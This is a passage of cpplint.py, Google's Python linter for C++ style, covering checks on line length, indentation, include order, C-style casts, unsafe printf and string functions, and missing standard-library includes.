error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
# Avoid preprocessor lines
if Match(r'^\s*#', line):
return
# Last ditch effort to avoid multi-line comments. This will not help
# if the comment started before the current line or ended after the
# current line, but it catches most of the false positives. At least,
# it provides a way to workaround this warning for people who use
# multi-line comments in preprocessor macros.
#
# TODO(unknown): remove this once cpplint has better support for
# multi-line comments.
if line.find('/*') >= 0 or line.find('*/') >= 0:
return
for match in _ALT_TOKEN_REPLACEMENT_PATTERN.finditer(line):
error(filename, linenum, 'readability/alt_tokens', 2,
'Use operator %s instead of %s' % (
_ALT_TOKEN_REPLACEMENT[match.group(1)], match.group(1)))
def GetLineWidth(line):
"""Determines the width of the line in column positions.
Args:
line: A string, which may be a Unicode string.
Returns:
The width of the line in column positions, accounting for Unicode
combining characters and wide characters.
"""
if isinstance(line, unicode):
width = 0
for uc in unicodedata.normalize('NFC', line):
if unicodedata.east_asian_width(uc) in ('W', 'F'):
width += 2
elif not unicodedata.combining(uc):
width += 1
return width
else:
return len(line)
def CheckStyle(filename, clean_lines, linenum, file_extension, nesting_state,
error):
"""Checks rules from the 'C++ style rules' section of cppguide.html.
Most of these rules are hard to test (naming, comment style), but we
do what we can. In particular we check for 2-space indents, line lengths,
tab usage, spaces inside code, etc.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
file_extension: The extension (without the dot) of the filename.
nesting_state: A _NestingState instance which maintains information about
the current stack of nested blocks being parsed.
error: The function to call with any errors found.
"""
raw_lines = clean_lines.raw_lines
line = raw_lines[linenum]
if line.find('\t') != -1:
error(filename, linenum, 'whitespace/tab', 1,
'Tab found; better to use spaces')
# One or three blank spaces at the beginning of the line is weird; it's
# hard to reconcile that with 2-space indents.
# NOTE: here are the conditions rob pike used for his tests. Mine aren't
# as sophisticated, but it may be worth becoming so: RLENGTH==initial_spaces
# if(RLENGTH > 20) complain = 0;
# if(match($0, " +(error|private|public|protected):")) complain = 0;
# if(match(prev, "&& *$")) complain = 0;
# if(match(prev, "\\|\\| *$")) complain = 0;
# if(match(prev, "[\",=><] *$")) complain = 0;
# if(match($0, " <<")) complain = 0;
# if(match(prev, " +for \\(")) complain = 0;
# if(prevodd && match(prevprev, " +for \\(")) complain = 0;
initial_spaces = 0
cleansed_line = clean_lines.elided[linenum]
while initial_spaces < len(line) and line[initial_spaces] == ' ':
initial_spaces += 1
if line and line[-1].isspace():
error(filename, linenum, 'whitespace/end_of_line', 4,
'Line ends in whitespace. Consider deleting these extra spaces.')
# There are certain situations we allow one space, notably for labels
elif ((initial_spaces == 1 or initial_spaces == 3) and
not Match(r'\s*\w+\s*:\s*$', cleansed_line)):
error(filename, linenum, 'whitespace/indent', 3,
'Weird number of spaces at line-start. '
'Are you using a 2-space indent?')
# Labels should always be indented at least one space.
elif not initial_spaces and line[:2] != '//' and Search(r'[^:]:\s*$',
line):
error(filename, linenum, 'whitespace/labels', 4,
'Labels should always be indented at least one space. '
'If this is a member-initializer list in a constructor or '
'the base class list in a class definition, the colon should '
'be on the following line.')
# Check if the line is a header guard.
is_header_guard = False
if file_extension == 'h':
cppvar = GetHeaderGuardCPPVariable(filename)
if (line.startswith('#ifndef %s' % cppvar) or
line.startswith('#define %s' % cppvar) or
line.startswith('#endif // %s' % cppvar)):
is_header_guard = True
# #include lines and header guards can be long, since there's no clean way to
# split them.
#
# URLs can be long too. It's possible to split these, but it makes them
# harder to cut&paste.
#
# The "$Id:...$" comment may also get very long without it being the
# developers fault.
if (not line.startswith('#include') and not is_header_guard and
not Match(r'^\s*//.*http(s?)://\S*$', line) and
not Match(r'^// \$Id:.*#[0-9]+ \$$', line)):
line_width = GetLineWidth(line)
if line_width > 100:
error(filename, linenum, 'whitespace/line_length', 4,
'Lines should very rarely be longer than 100 characters')
elif line_width > 80:
error(filename, linenum, 'whitespace/line_length', 2,
'Lines should be <= 80 characters long')
if (cleansed_line.count(';') > 1 and
# for loops are allowed two ;'s (and may run over two lines).
cleansed_line.find('for') == -1 and
(GetPreviousNonBlankLine(clean_lines, linenum)[0].find('for') == -1 or
GetPreviousNonBlankLine(clean_lines, linenum)[0].find(';') != -1) and
# It's ok to have many commands in a switch case that fits in 1 line
not ((cleansed_line.find('case ') != -1 or
cleansed_line.find('default:') != -1) and
cleansed_line.find('break;') != -1)):
error(filename, linenum, 'whitespace/newline', 0,
'More than one command on the same line')
# Some more style checks
CheckBraces(filename, clean_lines, linenum, error)
CheckEmptyLoopBody(filename, clean_lines, linenum, error)
CheckAccess(filename, clean_lines, linenum, nesting_state, error)
CheckSpacing(filename, clean_lines, linenum, nesting_state, error)
CheckCheck(filename, clean_lines, linenum, error)
CheckAltTokens(filename, clean_lines, linenum, error)
classinfo = nesting_state.InnermostClass()
if classinfo:
CheckSectionSpacing(filename, clean_lines, classinfo, linenum, error)
_RE_PATTERN_INCLUDE_NEW_STYLE = re.compile(r'#include +"[^/]+\.h"')
_RE_PATTERN_INCLUDE = re.compile(r'^\s*#\s*include\s*([<"])([^>"]*)[>"].*$')
# Matches the first component of a filename delimited by -s and _s. That is:
# _RE_FIRST_COMPONENT.match('foo').group(0) == 'foo'
# _RE_FIRST_COMPONENT.match('foo.cc').group(0) == 'foo'
# _RE_FIRST_COMPONENT.match('foo-bar_baz.cc').group(0) == 'foo'
# _RE_FIRST_COMPONENT.match('foo_bar-baz.cc').group(0) == 'foo'
_RE_FIRST_COMPONENT = re.compile(r'^[^-_.]+')
def _DropCommonSuffixes(filename):
"""Drops common suffixes like _test.cc or -inl.h from filename.
For example:
>>> _DropCommonSuffixes('foo/foo-inl.h')
'foo/foo'
>>> _DropCommonSuffixes('foo/bar/foo.cc')
'foo/bar/foo'
>>> _DropCommonSuffixes('foo/foo_internal.h')
'foo/foo'
>>> _DropCommonSuffixes('foo/foo_unusualinternal.h')
'foo/foo_unusualinternal'
Args:
filename: The input filename.
Returns:
The filename with the common suffix removed.
"""
for suffix in ('test.cc', 'regtest.cc', 'unittest.cc',
'inl.h', 'impl.h', 'internal.h'):
if (filename.endswith(suffix) and len(filename) > len(suffix) and
filename[-len(suffix) - 1] in ('-', '_')):
return filename[:-len(suffix) - 1]
return os.path.splitext(filename)[0]
def _IsTestFilename(filename):
"""Determines if the given filename has a suffix that identifies it as a test.
Args:
filename: The input filename.
Returns:
True if 'filename' looks like a test, False otherwise.
"""
if (filename.endswith('_test.cc') or
filename.endswith('_unittest.cc') or
filename.endswith('_regtest.cc')):
return True
else:
return False
def _ClassifyInclude(fileinfo, include, is_system):
"""Figures out what kind of header 'include' is.
Args:
fileinfo: The current file cpplint is running over. A FileInfo instance.
include: The path to a #included file.
is_system: True if the #include used <> rather than "".
Returns:
One of the _XXX_HEADER constants.
For example:
>>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'stdio.h', True)
_C_SYS_HEADER
>>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'string', True)
_CPP_SYS_HEADER
>>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'foo/foo.h', False)
_LIKELY_MY_HEADER
>>> _ClassifyInclude(FileInfo('foo/foo_unknown_extension.cc'),
... 'bar/foo_other_ext.h', False)
_POSSIBLE_MY_HEADER
>>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'foo/bar.h', False)
_OTHER_HEADER
"""
# This is a list of all standard c++ header files, except
# those already checked for above.
is_stl_h = include in _STL_HEADERS
is_cpp_h = is_stl_h or include in _CPP_HEADERS
if is_system:
if is_cpp_h:
return _CPP_SYS_HEADER
else:
return _C_SYS_HEADER
# If the target file and the include we're checking share a
# basename when we drop common extensions, and the include
# lives in . , then it's likely to be owned by the target file.
target_dir, target_base = (
os.path.split(_DropCommonSuffixes(fileinfo.RepositoryName())))
include_dir, include_base = os.path.split(_DropCommonSuffixes(include))
if target_base == include_base and (
include_dir == target_dir or
include_dir == os.path.normpath(target_dir + '/../public')):
return _LIKELY_MY_HEADER
# If the target and include share some initial basename
# component, it's possible the target is implementing the
# include, so it's allowed to be first, but we'll never
# complain if it's not there.
target_first_component = _RE_FIRST_COMPONENT.match(target_base)
include_first_component = _RE_FIRST_COMPONENT.match(include_base)
if (target_first_component and include_first_component and
target_first_component.group(0) ==
include_first_component.group(0)):
return _POSSIBLE_MY_HEADER
return _OTHER_HEADER
def CheckIncludeLine(filename, clean_lines, linenum, include_state, error):
"""Check rules that are applicable to #include lines.
Strings on #include lines are NOT removed from elided line, to make
certain tasks easier. However, to prevent false positives, checks
applicable to #include lines in CheckLanguage must be put here.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
include_state: An _IncludeState instance in which the headers are inserted.
error: The function to call with any errors found.
"""
fileinfo = FileInfo(filename)
line = clean_lines.lines[linenum]
# "include" should use the new style "foo/bar.h" instead of just "bar.h"
if _RE_PATTERN_INCLUDE_NEW_STYLE.search(line):
error(filename, linenum, 'build/include', 4,
'Include the directory when naming .h files')
# we shouldn't include a file more than once. actually, there are a
# handful of instances where doing so is okay, but in general it's
# not.
match = _RE_PATTERN_INCLUDE.search(line)
if match:
include = match.group(2)
is_system = (match.group(1) == '<')
if include in include_state:
error(filename, linenum, 'build/include', 4,
'"%s" already included at %s:%s' %
(include, filename, include_state[include]))
else:
include_state[include] = linenum
# We want to ensure that headers appear in the right order:
# 1) for foo.cc, foo.h (preferred location)
# 2) c system files
# 3) cpp system files
# 4) for foo.cc, foo.h (deprecated location)
# 5) other google headers
#
# We classify each include statement as one of those 5 types
# using a number of techniques. The include_state object keeps
# track of the highest type seen, and complains if we see a
# lower type after that.
error_message = include_state.CheckNextIncludeOrder(
_ClassifyInclude(fileinfo, include, is_system))
if error_message:
error(filename, linenum, 'build/include_order', 4,
'%s. Should be: %s.h, c system, c++ system, other.' %
(error_message, fileinfo.BaseName()))
if not include_state.IsInAlphabeticalOrder(include):
error(filename, linenum, 'build/include_alpha', 4,
'Include "%s" not in alphabetical order' % include)
# Look for any of the stream classes that are part of standard C++.
match = _RE_PATTERN_INCLUDE.match(line)
if match:
include = match.group(2)
if Match(r'(f|ind|io|i|o|parse|pf|stdio|str|)?stream$', include):
# Many unit tests use cout, so we exempt them.
if not _IsTestFilename(filename):
error(filename, linenum, 'readability/streams', 3,
'Streams are highly discouraged.')
def _GetTextInside(text, start_pattern):
"""Retrieves all the text between matching open and close parentheses.
Given a string of lines and a regular expression string, retrieve all the text
following the expression and between opening punctuation symbols like
(, [, or {, and the matching close-punctuation symbol. This properly nested
occurrences of the punctuations, so for the text like
printf(a(), b(c()));
a call to _GetTextInside(text, r'printf\(') will return 'a(), b(c())'.
start_pattern must match string having an open punctuation symbol at the end.
Args:
text: The lines to extract text. Its comments and strings must be elided.
It can be single line and can span multiple lines.
start_pattern: The regexp string indicating where to start extracting
the text.
Returns:
The extracted text.
None if either the opening string or ending punctuation could not be found.
"""
# TODO(sugawarayu): Audit cpplint.py to see what places could be profitably
# rewritten to use _GetTextInside (and use inferior regexp matching today).
# Give opening punctuations to get the matching close-punctuations.
matching_punctuation = {'(': ')', '{': '}', '[': ']'}
closing_punctuation = set(matching_punctuation.itervalues())
# Find the position to start extracting text.
match = re.search(start_pattern, text, re.M)
if not match: # start_pattern not found in text.
return None
start_position = match.end(0)
assert start_position > 0, (
'start_pattern must ends with an opening punctuation.')
assert text[start_position - 1] in matching_punctuation, (
'start_pattern must ends with an opening punctuation.')
# Stack of closing punctuations we expect to have in text after position.
punctuation_stack = [matching_punctuation[text[start_position - 1]]]
position = start_position
while punctuation_stack and position < len(text):
if text[position] == punctuation_stack[-1]:
punctuation_stack.pop()
elif text[position] in closing_punctuation:
# A closing punctuation without matching opening punctuations.
return None
elif text[position] in matching_punctuation:
punctuation_stack.append(matching_punctuation[text[position]])
position += 1
if punctuation_stack:
# Opening punctuations left without matching close-punctuations.
return None
# punctuations match.
return text[start_position:position - 1]
def CheckLanguage(filename, clean_lines, linenum, file_extension, include_state,
error):
"""Checks rules from the 'C++ language rules' section of cppguide.html.
Some of these rules are hard to test (function overloading, using
uint32 inappropriately), but we do the best we can.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
file_extension: The extension (without the dot) of the filename.
include_state: An _IncludeState instance in which the headers are inserted.
error: The function to call with any errors found.
"""
# If the line is empty or consists of entirely a comment, no need to
# check it.
line = clean_lines.elided[linenum]
if not line:
return
match = _RE_PATTERN_INCLUDE.search(line)
if match:
CheckIncludeLine(filename, clean_lines, linenum, include_state, error)
return
# Create an extended_line, which is the concatenation of the current and
# next lines, for more effective checking of code that may span more than one
# line.
if linenum + 1 < clean_lines.NumLines():
extended_line = line + clean_lines.elided[linenum + 1]
else:
extended_line = line
# Make Windows paths like Unix.
fullname = os.path.abspath(filename).replace('\\', '/')
# TODO(unknown): figure out if they're using default arguments in fn proto.
# Check for non-const references in functions. This is tricky because &
# is also used to take the address of something. We allow <> for templates,
# (ignoring whatever is between the braces) and : for classes.
# These are complicated re's. They try to capture the following:
# paren (for fn-prototype start), typename, &, varname. For the const
# version, we're willing for const to be before typename or after
# Don't check the implementation on same line.
fnline = line.split('{', 1)[0]
if (len(re.findall(r'\([^()]*\b(?:[\w:]|<[^()]*>)+(\s?&|&\s?)\w+', fnline)) >
len(re.findall(r'\([^()]*\bconst\s+(?:typename\s+)?(?:struct\s+)?'
r'(?:[\w:]|<[^()]*>)+(\s?&|&\s?)\w+', fnline)) +
len(re.findall(r'\([^()]*\b(?:[\w:]|<[^()]*>)+\s+const(\s?&|&\s?)[\w]+',
fnline))):
# We allow non-const references in a few standard places, like functions
# called "swap()" or iostream operators like "<<" or ">>". We also filter
# out for loops, which lint otherwise mistakenly thinks are functions.
if not Search(
r'(for|swap|Swap|operator[<>][<>])\s*\(\s*'
r'(?:(?:typename\s*)?[\w:]|<.*>)+\s*&',
fnline):
error(filename, linenum, 'runtime/references', 2,
'Is this a non-const reference? '
'If so, make const or use a pointer.')
# Check to see if they're using an conversion function cast.
# I just try to capture the most common basic types, though there are more.
# Parameterless conversion functions, such as bool(), are allowed as they are
# probably a member operator declaration or default constructor.
match = Search(
r'(\bnew\s+)?\b' # Grab 'new' operator, if it's there
r'(int|float|double|bool|char|int32|uint32|int64|uint64)\([^)]', line)
if match:
# gMock methods are defined using some variant of MOCK_METHODx(name, type)
# where type may be float(), int(string), etc. Without context they are
# virtually indistinguishable from int(x) casts. Likewise, gMock's
# MockCallback takes a template parameter of the form return_type(arg_type),
# which looks much like the cast we're trying to detect.
if (match.group(1) is None and # If new operator, then this isn't a cast
not (Match(r'^\s*MOCK_(CONST_)?METHOD\d+(_T)?\(', line) or
Match(r'^\s*MockCallback<.*>', line))):
# Try a bit harder to catch gmock lines: the only place where
# something looks like an old-style cast is where we declare the
# return type of the mocked method, and the only time when we
# are missing context is if MOCK_METHOD was split across
# multiple lines (for example http://go/hrfhr ), so we only need
# to check the previous line for MOCK_METHOD.
if (linenum == 0 or
not Match(r'^\s*MOCK_(CONST_)?METHOD\d+(_T)?\(\S+,\s*$',
clean_lines.elided[linenum - 1])):
error(filename, linenum, 'readability/casting', 4,
'Using deprecated casting style. '
'Use static_cast<%s>(...) instead' %
match.group(2))
CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum],
'static_cast',
r'\((int|float|double|bool|char|u?int(16|32|64))\)', error)
# This doesn't catch all cases. Consider (const char * const)"hello".
#
# (char *) "foo" should always be a const_cast (reinterpret_cast won't
# compile).
if CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum],
'const_cast', r'\((char\s?\*+\s?)\)\s*"', error):
pass
else:
# Check pointer casts for other than string constants
CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum],
'reinterpret_cast', r'\((\w+\s?\*+\s?)\)', error)
# In addition, we look for people taking the address of a cast. This
# is dangerous -- casts can assign to temporaries, so the pointer doesn't
# point where you think.
if Search(
r'(&\([^)]+\)[\w(])|(&(static|dynamic|reinterpret)_cast\b)', line):
error(filename, linenum, 'runtime/casting', 4,
('Are you taking an address of a cast? '
'This is dangerous: could be a temp var. '
'Take the address before doing the cast, rather than after'))
# Check for people declaring static/global STL strings at the top level.
# This is dangerous because the C++ language does not guarantee that
# globals with constructors are initialized before the first access.
match = Match(
r'((?:|static +)(?:|const +))string +([a-zA-Z0-9_:]+)\b(.*)',
line)
# Make sure it's not a function.
# Function template specialization looks like: "string foo<Type>(...".
# Class template definitions look like: "string Foo<Type>::Method(...".
if match and not Match(r'\s*(<.*>)?(::[a-zA-Z0-9_]+)?\s*\(([^"]|$)',
match.group(3)):
error(filename, linenum, 'runtime/string', 4,
'For a static/global string constant, use a C style string instead: '
'"%schar %s[]".' %
(match.group(1), match.group(2)))
# Check that we're not using RTTI outside of testing code.
if Search(r'\bdynamic_cast<', line) and not _IsTestFilename(filename):
error(filename, linenum, 'runtime/rtti', 5,
'Do not use dynamic_cast<>. If you need to cast within a class '
"hierarchy, use static_cast<> to upcast. Google doesn't support "
'RTTI.')
if Search(r'\b([A-Za-z0-9_]*_)\(\1\)', line):
error(filename, linenum, 'runtime/init', 4,
'You seem to be initializing a member variable with itself.')
if file_extension == 'h':
# TODO(unknown): check that 1-arg constructors are explicit.
# How to tell it's a constructor?
# (handled in CheckForNonStandardConstructs for now)
# TODO(unknown): check that classes have DISALLOW_EVIL_CONSTRUCTORS
# (level 1 error)
pass
# Check if people are using the verboten C basic types. The only exception
# we regularly allow is "unsigned short port" for port.
if Search(r'\bshort port\b', line):
if not Search(r'\bunsigned short port\b', line):
error(filename, linenum, 'runtime/int', 4,
'Use "unsigned short" for ports, not "short"')
else:
match = Search(r'\b(short|long(?! +double)|long long)\b', line)
if match:
error(filename, linenum, 'runtime/int', 4,
'Use int16/int64/etc, rather than the C type %s' % match.group(1))
# When snprintf is used, the second argument shouldn't be a literal.
match = Search(r'snprintf\s*\(([^,]*),\s*([0-9]*)\s*,', line)
if match and match.group(2) != '0':
# If 2nd arg is zero, snprintf is used to calculate size.
error(filename, linenum, 'runtime/printf', 3,
'If you can, use sizeof(%s) instead of %s as the 2nd arg '
'to snprintf.' % (match.group(1), match.group(2)))
# Check if some verboten C functions are being used.
if Search(r'\bsprintf\b', line):
error(filename, linenum, 'runtime/printf', 5,
'Never use sprintf. Use snprintf instead.')
match = Search(r'\b(strcpy|strcat)\b', line)
if match:
error(filename, linenum, 'runtime/printf', 4,
'Almost always, snprintf is better than %s' % match.group(1))
if Search(r'\bsscanf\b', line):
error(filename, linenum, 'runtime/printf', 1,
'sscanf can be ok, but is slow and can overflow buffers.')
# Check if some verboten operator overloading is going on
# TODO(unknown): catch out-of-line unary operator&:
# class X {};
# int operator&(const X& x) { return 42; } // unary operator&
# The trick is it's hard to tell apart from binary operator&:
# class Y { int operator&(const Y& x) { return 23; } }; // binary operator&
if Search(r'\boperator\s*&\s*\(\s*\)', line):
error(filename, linenum, 'runtime/operator', 4,
'Unary operator& is dangerous. Do not use it.')
# Check for suspicious usage of "if" like
# } if (a == b) {
if Search(r'\}\s*if\s*\(', line):
error(filename, linenum, 'readability/braces', 4,
'Did you mean "else if"? If not, start a new line for "if".')
# Check for potential format string bugs like printf(foo).
# We constrain the pattern not to pick things like DocidForPrintf(foo).
# Not perfect but it can catch printf(foo.c_str()) and printf(foo->c_str())
# TODO(sugawarayu): Catch the following case. Need to change the calling
# convention of the whole function to process multiple line to handle it.
# printf(
# boy_this_is_a_really_long_variable_that_cannot_fit_on_the_prev_line);
printf_args = _GetTextInside(line, r'(?i)\b(string)?printf\s*\(')
if printf_args:
match = Match(r'([\w.\->()]+)$', printf_args)
if match and match.group(1) != '__VA_ARGS__':
function_name = re.search(r'\b((?:string)?printf)\s*\(',
line, re.I).group(1)
error(filename, linenum, 'runtime/printf', 4,
'Potential format string bug. Do %s("%%s", %s) instead.'
% (function_name, match.group(1)))
# Check for potential memset bugs like memset(buf, sizeof(buf), 0).
match = Search(r'memset\s*\(([^,]*),\s*([^,]*),\s*0\s*\)', line)
if match and not Match(r"^''|-?[0-9]+|0x[0-9A-Fa-f]$", match.group(2)):
error(filename, linenum, 'runtime/memset', 4,
'Did you mean "memset(%s, 0, %s)"?'
% (match.group(1), match.group(2)))
if Search(r'\busing namespace\b', line):
error(filename, linenum, 'build/namespaces', 5,
'Do not use namespace using-directives. '
'Use using-declarations instead.')
# Detect variable-length arrays.
match = Match(r'\s*(.+::)?(\w+) [a-z]\w*\[(.+)];', line)
if (match and match.group(2) != 'return' and match.group(2) != 'delete' and
match.group(3).find(']') == -1):
# Split the size using space and arithmetic operators as delimiters.
# If any of the resulting tokens are not compile time constants then
# report the error.
tokens = re.split(r'\s|\+|\-|\*|\/|<<|>>]', match.group(3))
is_const = True
skip_next = False
for tok in tokens:
if skip_next:
skip_next = False
continue
if Search(r'sizeof\(.+\)', tok): continue
if Search(r'arraysize\(\w+\)', tok): continue
tok = tok.lstrip('(')
tok = tok.rstrip(')')
if not tok: continue
if Match(r'\d+', tok): continue
if Match(r'0[xX][0-9a-fA-F]+', tok): continue
if Match(r'k[A-Z0-9]\w*', tok): continue
if Match(r'(.+::)?k[A-Z0-9]\w*', tok): continue
if Match(r'(.+::)?[A-Z][A-Z0-9_]*', tok): continue
# A catch all for tricky sizeof cases, including 'sizeof expression',
# 'sizeof(*type)', 'sizeof(const type)', 'sizeof(struct StructName)'
# requires skipping the next token because we split on ' ' and '*'.
if tok.startswith('sizeof'):
skip_next = True
continue
is_const = False
break
if not is_const:
error(filename, linenum, 'runtime/arrays', 1,
'Do not use variable-length arrays. Use an appropriately named '
"('k' followed by CamelCase) compile-time constant for the size.")
# If DISALLOW_EVIL_CONSTRUCTORS, DISALLOW_COPY_AND_ASSIGN, or
# DISALLOW_IMPLICIT_CONSTRUCTORS is present, then it should be the last thing
# in the class declaration.
match = Match(
(r'\s*'
r'(DISALLOW_(EVIL_CONSTRUCTORS|COPY_AND_ASSIGN|IMPLICIT_CONSTRUCTORS))'
r'\(.*\);$'),
line)
if match and linenum + 1 < clean_lines.NumLines():
next_line = clean_lines.elided[linenum + 1]
# We allow some, but not all, declarations of variables to be present
# in the statement that defines the class. The [\w\*,\s]* fragment of
# the regular expression below allows users to declare instances of
# the class or pointers to instances, but not less common types such
# as function pointers or arrays. It's a tradeoff between allowing
# reasonable code and avoiding trying to parse more C++ using regexps.
if not Search(r'^\s*}[\w\*,\s]*;', next_line):
error(filename, linenum, 'readability/constructors', 3,
match.group(1) + ' should be the last thing in the class')
# Check for use of unnamed namespaces in header files. Registration
# macros are typically OK, so we allow use of "namespace {" on lines
# that end with backslashes.
if (file_extension == 'h'
and Search(r'\bnamespace\s*{', line)
and line[-1] != '\\'):
error(filename, linenum, 'build/namespaces', 4,
'Do not use unnamed namespaces in header files. See '
'http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml#Namespaces'
' for more information.')
def CheckCStyleCast(filename, linenum, line, raw_line, cast_type, pattern,
error):
"""Checks for a C-style cast by looking for the pattern.
This also handles sizeof(type) warnings, due to similarity of content.
Args:
filename: The name of the current file.
linenum: The number of the line to check.
line: The line of code to check.
raw_line: The raw line of code to check, with comments.
cast_type: The string for the C++ cast to recommend. This is either
reinterpret_cast, static_cast, or const_cast, depending.
pattern: The regular expression used to find C-style casts.
error: The function to call with any errors found.
Returns:
True if an error was emitted.
False otherwise.
"""
match = Search(pattern, line)
if not match:
return False
# e.g., sizeof(int)
sizeof_match = Match(r'.*sizeof\s*$', line[0:match.start(1) - 1])
if sizeof_match:
error(filename, linenum, 'runtime/sizeof', 1,
'Using sizeof(type). Use sizeof(varname) instead if possible')
return True
# operator++(int) and operator--(int)
if (line[0:match.start(1) - 1].endswith(' operator++') or
line[0:match.start(1) - 1].endswith(' operator--')):
return False
remainder = line[match.end(0):]
# The close paren is for function pointers as arguments to a function.
# eg, void foo(void (*bar)(int));
# The semicolon check is a more basic function check; also possibly a
# function pointer typedef.
# eg, void foo(int); or void foo(int) const;
# The equals check is for function pointer assignment.
# eg, void *(*foo)(int) = ...
# The > is for MockCallback<...> ...
#
# Right now, this will only catch cases where there's a single argument, and
# it's unnamed. It should probably be expanded to check for multiple
# arguments with some unnamed.
function_match = Match(r'\s*(\)|=|(const)?\s*(;|\{|throw\(\)|>))', remainder)
if function_match:
if (not function_match.group(3) or
function_match.group(3) == ';' or
('MockCallback<' not in raw_line and
'/*' not in raw_line)):
error(filename, linenum, 'readability/function', 3,
'All parameters should be named in a function')
return True
# At this point, all that should be left is actual casts.
error(filename, linenum, 'readability/casting', 4,
'Using C-style cast. Use %s<%s>(...) instead' %
(cast_type, match.group(1)))
return True
_HEADERS_CONTAINING_TEMPLATES = (
('<deque>', ('deque',)),
('<functional>', ('unary_function', 'binary_function',
'plus', 'minus', 'multiplies', 'divides', 'modulus',
'negate',
'equal_to', 'not_equal_to', 'greater', 'less',
'greater_equal', 'less_equal',
'logical_and', 'logical_or', 'logical_not',
'unary_negate', 'not1', 'binary_negate', 'not2',
'bind1st', 'bind2nd',
'pointer_to_unary_function',
'pointer_to_binary_function',
'ptr_fun',
'mem_fun_t', 'mem_fun', 'mem_fun1_t', 'mem_fun1_ref_t',
'mem_fun_ref_t',
'const_mem_fun_t', 'const_mem_fun1_t',
'const_mem_fun_ref_t', 'const_mem_fun1_ref_t',
'mem_fun_ref',
)),
('<limits>', ('numeric_limits',)),
('<list>', ('list',)),
('<map>', ('map', 'multimap',)),
('<memory>', ('allocator',)),
('<queue>', ('queue', 'priority_queue',)),
('<set>', ('set', 'multiset',)),
('<stack>', ('stack',)),
('<string>', ('char_traits', 'basic_string',)),
('<utility>', ('pair',)),
('<vector>', ('vector',)),
# gcc extensions.
# Note: std::hash is their hash, ::hash is our hash
('<hash_map>', ('hash_map', 'hash_multimap',)),
('<hash_set>', ('hash_set', 'hash_multiset',)),
('<slist>', ('slist',)),
)
_RE_PATTERN_STRING = re.compile(r'\bstring\b')
_re_pattern_algorithm_header = []
for _template in ('copy', 'max', 'min', 'min_element', 'sort', 'swap',
'transform'):
# Match max<type>(..., ...), max(..., ...), but not foo->max, foo.max or
# type::max().
_re_pattern_algorithm_header.append(
(re.compile(r'[^>.]\b' + _template + r'(<.*?>)?\([^\)]'),
_template,
'<algorithm>'))
_re_pattern_templates = []
for _header, _templates in _HEADERS_CONTAINING_TEMPLATES:
for _template in _templates:
_re_pattern_templates.append(
(re.compile(r'(\<|\b)' + _template + r'\s*\<'),
_template + '<>',
_header))
def FilesBelongToSameModule(filename_cc, filename_h):
"""Check if these two filenames belong to the same module.
The concept of a 'module' here is a as follows:
foo.h, foo-inl.h, foo.cc, foo_test.cc and foo_unittest.cc belong to the
same 'module' if they are in the same directory.
some/path/public/xyzzy and some/path/internal/xyzzy are also considered
to belong to the same module here.
If the filename_cc contains a longer path than the filename_h, for example,
'/absolute/path/to/base/sysinfo.cc', and this file would include
'base/sysinfo.h', this function also produces the prefix needed to open the
header. This is used by the caller of this function to more robustly open the
header file. We don't have access to the real include paths in this context,
so we need this guesswork here.
Known bugs: tools/base/bar.cc and base/bar.h belong to the same module
according to this implementation. Because of this, this function gives
some false positives. This should be sufficiently rare in practice.
Args:
filename_cc: is the path for the .cc file
filename_h: is the path for the header path
Returns:
Tuple with a bool and a string:
bool: True if filename_cc and filename_h belong to the same module.
string: the additional prefix needed to open the header file.
"""
if not filename_cc.endswith('.cc'):
return (False, '')
filename_cc = filename_cc[:-len('.cc')]
if filename_cc.endswith('_unittest'):
filename_cc = filename_cc[:-len('_unittest')]
elif filename_cc.endswith('_test'):
filename_cc = filename_cc[:-len('_test')]
filename_cc = filename_cc.replace('/public/', '/')
filename_cc = filename_cc.replace('/internal/', '/')
if not filename_h.endswith('.h'):
return (False, '')
filename_h = filename_h[:-len('.h')]
if filename_h.endswith('-inl'):
filename_h = filename_h[:-len('-inl')]
filename_h = filename_h.replace('/public/', '/')
filename_h = filename_h.replace('/internal/', '/')
files_belong_to_same_module = filename_cc.endswith(filename_h)
common_path = ''
if files_belong_to_same_module:
common_path = filename_cc[:-len(filename_h)]
return files_belong_to_same_module, common_path
def UpdateIncludeState(filename, include_state, io=codecs):
"""Fill up the include_state with new includes found from the file.
Args:
filename: the name of the header to read.
include_state: an _IncludeState instance in which the headers are inserted.
io: The io factory to use to read the file. Provided for testability.
Returns:
True if a header was succesfully added. False otherwise.
"""
headerfile = None
try:
headerfile = io.open(filename, 'r', 'utf8', 'replace')
except IOError:
return False
linenum = 0
for line in headerfile:
linenum += 1
clean_line = CleanseComments(line)
match = _RE_PATTERN_INCLUDE.search(clean_line)
if match:
include = match.group(2)
# The value formatting is cute, but not really used right now.
# What matters here is that the key is in include_state.
include_state.setdefault(include, '%s:%d' % (filename, linenum))
return True
def CheckForIncludeWhatYouUse(filename, clean_lines, include_state, error,
io=codecs):
"""Reports for missing stl includes.
This function will output warnings to make sure you are including the headers
necessary for the stl containers and functions that you use. We only give one
reason to include a header. For example, if you use both equal_to<> and
less<> in a .h file, only one (the latter in the file) of these will be
reported as a reason to include the <functional>.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
include_state: An _IncludeState instance.
error: The function to call with any errors found.
io: The IO factory to use to read the header file. Provided for unittest
injection.
"""
required = {} # A map of header name to linenumber and the template entity.
# Example of required: { '<functional>': (1219, 'less<>') }
for linenum in xrange(clean_lines.NumLines()):
line = clean_lines.elided[linenum]
if not line or line[0] == '#':
continue
# String is special -- it is a non-templatized type in STL.
matched = _RE_PATTERN_STRING.search(line)
if matched:
# Don't warn about strings in non-STL namespaces:
# (We check only the first match per line; good enough.)
prefix = line[:matched.start()]
if prefix.endswith('std::') or not prefix.endswith('::'):
required['<string>'] = (linenum, 'string')
for pattern, template, header in _re_pattern_algorithm_header:
